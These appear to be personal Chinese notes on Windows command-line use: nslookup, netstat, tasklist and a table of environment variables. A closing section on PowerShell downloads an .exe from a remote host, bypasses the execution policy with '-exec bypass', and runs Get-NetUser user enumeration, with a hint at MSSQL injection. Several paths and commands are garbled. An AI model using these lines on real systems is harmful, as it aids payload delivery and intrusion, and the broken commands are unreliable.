关于Windows的小笔记

nslookup正向解析为ip地址

nslookup www.baidu.com

nslookup -q=ptr ip地址 逆向解析域名地址

nslookup -q=mx 查询邮件交换记录

nslookup

set q=mx

netstat -anb 显示各种网络相关信息

tasklist 看系统上的每个进程

kill /pid id号 关掉id进程

windows常量

//变量                     类型       描述

//%ALLUSERSPROFILE%        本地       返回“所有用户”配置文件的位置。

//%APPDATA%                本地       返回默认情况下应用程序存储数据的位置。

//%CD%                     本地       返回当前目录字符串。

//%CMDCMDLINE%             本地       返回用来启动当前的 Cmd.exe 的准确命令行。

//%CMDEXTVERSION%          系统       返回当前的“命令处理程序扩展”的版本号。

//%COMPUTERNAME%           系统       返回计算机的名称。

//%COMSPEC%                系统       返回命令行解释器可执行程序的准确路径。

//%DATE%                   系统       返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。

//%ERRORLEVEL%             系统       返回上一条命令的错误代码。通常用非零值表示错误。

//%HOMEDRIVE%              系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

//%HOMEPATH%               系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

//%HOMESHARE%              系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

//%LOGONSERVER%            本地       返回验证当前登录会话的域控制器的名称。

//%NUMBER_OF_PROCESSORS%   系统       指定安装在计算机上的处理器的数目。

//%OS%                     系统       返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。

//%PATH%                   系统       指定可执行文件的搜索路径。

//%PATHEXT%                系统       返回操作系统认为可执行的文件扩展名的列表。

//%PROCESSOR_ARCHITECTURE% 系统       返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。

//%PROCESSOR_IDENTFIER%    系统       返回处理器说明。

//%PROCESSOR_LEVEL%        系统       返回计算机上安装的处理器的型号。

//%PROCESSOR_REVISION%     系统       返回处理器的版本号。

//%PROMPT%                 本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。

//%RANDOM%                 系统       返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。

//%SYSTEMDRIVE%            系统       返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。

//%SYSTEMROOT%             系统       返回 Windows server operating system 根目录的位置。

//%TEMP%和%TMP%            系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。

//%TIME%                   系统       返回当前时间。使用与time  /t 命令相同的格式。由Cmd.exe生成。有关time命令的详细信息，请参阅 Time。

//%USERDOMAIN%             本地       返回包含用户帐户的域的名称。

//%USERNAME%               本地       返回当前登录的用户的名称。

//%USERPROFILE%            本地       返回当前用户的配置文件的位置。

//%WINDIR%                 系统       返回操作系统目录的位置。

$client = new-object System.Net.WebClient

$client.DownloadFile('x1','x2')

X1，下载地址，x2输出名字

比如:（$client.DownloadFile('https://xxx/xxx.exe','C: est.zip')）

或

powershell IEX (New-Object System.Net.Webclient).DownloadFile('http://192.168.0.115/xx.exe','C:xxxx.exe')   

函数中url和path必须使用单引号，mssql中在引号中加入相同的引号，不需要转义，直接双写

原来的powershell是不能执行任何脚本的

要使用-exec bypass

powershell -exec bypass "import-module c:powershell.ps1;Get-NetUser;powerhsell.ps1 ......"

 远程挂载